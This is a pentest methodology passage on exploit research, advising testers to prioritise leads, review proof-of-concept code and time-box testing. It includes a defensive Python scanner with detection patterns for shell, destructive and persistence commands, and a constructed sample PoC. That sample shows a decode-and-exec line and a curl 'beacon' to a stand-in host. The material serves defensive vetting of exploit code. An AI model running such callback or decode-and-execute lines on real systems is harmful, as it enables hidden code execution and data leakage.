Exploit Research
This phase is critical and is more difficult than it may seem. You should have a plan when you approach this phase of the engagement. What are your hypotheses? What is your objective? What are the obstacles in your way?
During the Information Gathering phase, you should have created a list of things to try or research. Prioritize that list so that the highest-priority item is the one you believe will produce the most fruit given where you are and what you are trying to accomplish.
During this phase you should do a code review of any exploit or POC code you intend to use. Ideally, you want to know exactly what the code does before you run it. Not only could it be malicious, but knowing what the exploit is trying to do also helps you avoid wasting time on a script that simply will not work.
There will be times when the code is over your head. When this happens, do your best to understand, at a high level at least, what the exploit is and what is required for it to work.
This phase may go hand in hand with exploit development (modification) and exploit testing. As you research potential exploits in priority order, you may want to test those that seem promising. With this in mind, do not spend too long on one just because it seems promising. Set a timer for 30 minutes to 1 hour before you move on, or at least take a break. It may be helpful to reflect on what you know, what your assumptions (hypotheses) are, what your evidence is, how confident you are, and how you can test them.
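A first pass of that code review can be automated. The script below is an added example, not part of this page; it scans a downloaded PoC for the patterns that most often mean "read this line by hand before running anything" (callbacks to hard-coded hosts, decode-then-execute blobs, shell and destructive filesystem calls). The regexes and the sample PoC are constructed for illustration and the sample is deliberately not a working exploit.

```python
import re
from typing import Dict, List

# Constructed list of red flags; tune it to the PoCs you actually encounter.
RED_FLAGS: Dict[str, re.Pattern] = {
    "hardcoded_network_endpoint": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b|https?://[^\s'\"]+"),
    "dynamic_code_execution": re.compile(r"\b(?:eval|exec)\s*\("),
    "encoded_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),      # long base64-looking run
    "decode_and_run": re.compile(r"b64decode|base64\s+-d|fromhex"),
    "shell_execution": re.compile(r"os\.system|subprocess\.|popen\("),
    "destructive_fs_command": re.compile(r"\brm\s+-rf\b|shutil\.rmtree|os\.remove"),
    "persistence_hint": re.compile(r"crontab|\.bashrc|systemctl\s+enable|reg\s+add", re.I),
}

def review_poc(source: str) -> Dict[str, List[int]]:
    """Return {flag_name: [1-based line numbers]} for every red flag found."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RED_FLAGS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def triage(hits: Dict[str, List[int]]) -> str:
    """Turn the hit list into the reviewer's next action."""
    if "decode_and_run" in hits and ("dynamic_code_execution" in hits or "shell_execution" in hits):
        return "do not run: decodes and executes hidden code, decode the blob and read it first"
    if "hardcoded_network_endpoint" in hits:
        return "check every endpoint is your target, not a callback to the PoC author"
    if "destructive_fs_command" in hits or "persistence_hint" in hits:
        return "confirm the destructive/persistence step is intended and scoped"
    return "no red flags matched, still read it end to end"

# Constructed sample PoC (not a real exploit): phones home and runs a decoded blob.
SAMPLE_POC = "\n".join([
    "#!/usr/bin/env python3",
    "# Constructed sample, not a real exploit: a 'PoC' that phones home",
    "import base64, os",
    'TARGET = "http://192.0.2.10:8080/api/login"',
    'BLOB = "' + "QUFB" * 25 + '"',
    "exec(base64.b64decode(BLOB))",
    'os.system("curl http://198.51.100.7/beacon")',
])

if __name__ == "__main__":
    found = review_poc(SAMPLE_POC)
    for flag, lines in sorted(found.items()):
        print(f"{flag:28s} lines {lines}")
    print("verdict:", triage(found))
```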
After you find a potential exploit, review the exploit code and learn what the exploit is and how it works.
Give yourself a window of time to test it.